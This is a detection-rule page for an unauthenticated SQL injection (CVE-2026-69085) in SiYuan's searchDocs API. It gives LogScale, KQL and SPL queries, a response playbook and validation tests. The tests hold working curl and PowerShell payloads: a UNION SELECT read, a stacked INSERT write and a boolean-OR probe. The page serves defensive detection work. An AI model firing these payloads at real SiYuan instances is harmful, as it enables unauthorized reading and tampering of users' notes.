Detect SiYuan Unauthenticated SQL Injection in searchDocs (CVE-2026-69085) in CrowdStrike LogScale
Detects exploitation of CVE-2026-69085, an unauthenticated SQL injection in SiYuan's kernel searchDocs endpoint (/api/filetree/searchDocs) reachable in publish mode. The keyword parameter is interpolated into a SQL statement without escaping, allowing statement stacking against the embedded SQLite database for cross-notebook read and write. CVSS 10.0 (CWE-89), public PoC. Detection focuses on HTTP requests to the searchDocs API carrying SQL injection and statement-stacking payloads in the keyword field, and on anomalous database writes from the SiYuan kernel.
MITRE ATT&CK
- Tactic
- Initial Access Collection Impact
LogScale Detection Query
#event_simpleName=NetworkConnectIP4 OR #event_simpleName=HttpRequest
| HttpUrl=/.*\/api\/filetree\/searchDocs.*/i
| HttpRequestBody=/(union\s+select|';|--\s|attach\s+database|insert\s+into|drop\s+table|pragma\s)/i
| groupBy([aid, RemoteAddressIP4, HttpUrl], function=count())
| sort(_count, order=desc) CrowdStrike LogScale/CQL query surfacing SiYuan searchDocs HTTP requests whose body contains SQL injection or stacked-statement tokens.
Data Sources
Required Tables
False Positives & Tuning
- Benign note searches with SQL keyword content.
- Authorized security scanning tools.
- Internal QA or developer testing against the endpoint.
Other platforms for CVE-2026-69085
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1searchDocs UNION SELECT read probe
Expected signal: Web/proxy access log entry and SiYuan kernel log showing a POST to /api/filetree/searchDocs containing 'UNION SELECT'.
- Test 2searchDocs statement-stacking write
Expected signal: Access log entry with ';' and INSERT INTO in the request body; SiYuan database file modification timestamp updated.
- Test 3searchDocs boolean/comment injection probe
Expected signal: HTTP request telemetry showing POST to searchDocs containing "' OR '" and "-- " sequences.
References (5)
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-33jq-p8c2-q3q4
- https://nvd.nist.gov/vuln/detail/CVE-2026-69085
- https://github.com/siyuan-note/siyuan/releases/tag/v3.7.3
- https://www.vulncheck.com/advisories/siyuan-before-sql-injection-via-searchdocs
- https://github.com/advisories/GHSA-33jq-p8c2-q3q4
Response Playbook
Triage
- Confirm the targeted host runs SiYuan kernel (github.com/siyuan-note/siyuan/kernel) and whether it is exposed in publish mode; check the version against the fixed build 0.0.0-20260721043339-eef10568384e (v3.7.3).
- Extract the full keyword parameter from the matched request and decode it; determine whether it contains stacked statements (';'), write operations (INSERT/UPDATE/DROP), or data-exfiltration UNION SELECTs.
- Identify the source IP's authentication state — because the endpoint is unauthenticated in publish mode, treat any injection payload as unauthorized regardless of session.
- Correlate the source IP against prior access logs to establish whether this is a one-off probe or sustained exploitation, and whether multiple notebooks were accessed.
Containment
- Block the offending source IP(s) at the WAF/reverse proxy and restrict the SiYuan publish endpoint to trusted networks or behind authentication.
- Take the exposed SiYuan instance offline or disable publish mode until it is upgraded to v3.7.3 / build eef10568384e or later.
Evidence Collection
- Preserve web/proxy access logs, WAF logs, and the SiYuan kernel logs covering the request window, including full request bodies.
- Snapshot the SiYuan SQLite database files (workspace data/siyuan storage) to capture any attacker-induced writes before remediation.
- Capture the process list and open file handles of the kernel process to document database access during the incident.
Escalation Criteria
- !Escalate to IR if payloads include write/stacked statements (INSERT/UPDATE/DROP or ';') indicating cross-notebook modification rather than read-only probing.
- !Escalate if evidence shows successful data exfiltration across notebooks (UNION SELECT returning content) or if the instance held sensitive/regulated note data.
Investigation Guide
Related Techniques
Forensic Artifacts
- >
SiYuan kernel access/error logs - >
Web/reverse-proxy access logs with request bodies - >
SiYuan workspace SQLite database files and their modification timestamps - >
WAF/IPS alert records for the searchDocs endpoint
Tuning Guidance
Baseline legitimate searchDocs traffic from internal users to learn normal keyword content; benign note searches may contain isolated SQL keywords, so prioritize alerts that include stacking tokens (';'), comment sequences (--, /*), or write verbs over single keyword matches. Where possible, restrict detection to instances actually running in publish mode and scope by the SiYuan listening port (default 6806) to reduce noise.
Hunting Queries
Hunt for repeated SQL-injection attempts against the searchDocs endpoint grouped by source IP over time.
CommonSecurityLog | where RequestURL has "searchDocs" | extend b=tolower(AdditionalExtensions) | where b has_any("union select","';","attach database","pragma") | summarize count() by SourceIP, bin(TimeGenerated,1h) index=web uri="*searchDocs*" | eval p=lower(coalesce(form_data,request_body,uri_query)) | where match(p,"(?i)union\s+select|';|attach database|pragma") | stats count by src_ip Atomic Red Team Tests
Sends an unauthenticated POST to the SiYuan searchDocs API with a UNION SELECT payload in the keyword field to test cross-notebook read.
Command
curl -s -X POST http://localhost:6806/api/filetree/searchDocs -H 'Content-Type: application/json' -d '{"k":"test\u0027 UNION SELECT name,content FROM blocks -- "}' Cleanup
echo 'No persistent change from read-only probe; no cleanup required' Expected Telemetry
Web/proxy access log entry and SiYuan kernel log showing a POST to /api/filetree/searchDocs containing 'UNION SELECT'.
Expected Detection
KQL/SPL/EQL rules match on the UNION SELECT token in the request body to searchDocs.
Attempts a stacked statement in the keyword field to write to the embedded SQLite database.
Command
curl -s -X POST http://localhost:6806/api/filetree/searchDocs -H 'Content-Type: application/json' -d '{"k":"x\u0027; INSERT INTO blocks(id,content) VALUES(\u0027poc\u0027,\u0027pwned\u0027); -- "}' Cleanup
sqlite3 "$HOME/.config/siyuan/temp/siyuan.db" "DELETE FROM blocks WHERE id='poc';" 2>/dev/null || true Expected Telemetry
Access log entry with ';' and INSERT INTO in the request body; SiYuan database file modification timestamp updated.
Expected Detection
Detection rules match on the stacked-statement and INSERT INTO tokens, raising a high-severity write-exploitation alert.
Sends a classic boolean-OR with comment payload to the keyword parameter to fingerprint injectability.
Command
powershell -Command "Invoke-WebRequest -Uri http://localhost:6806/api/filetree/searchDocs -Method POST -ContentType 'application/json' -Body '{\"k\":\"a'' OR ''1''=''1'' -- \"}'" Cleanup
Write-Output 'No persistent change; no cleanup required' Expected Telemetry
HTTP request telemetry showing POST to searchDocs containing "' OR '" and "-- " sequences.
Expected Detection
Detection rules match on the boolean-OR and comment tokens in the searchDocs request.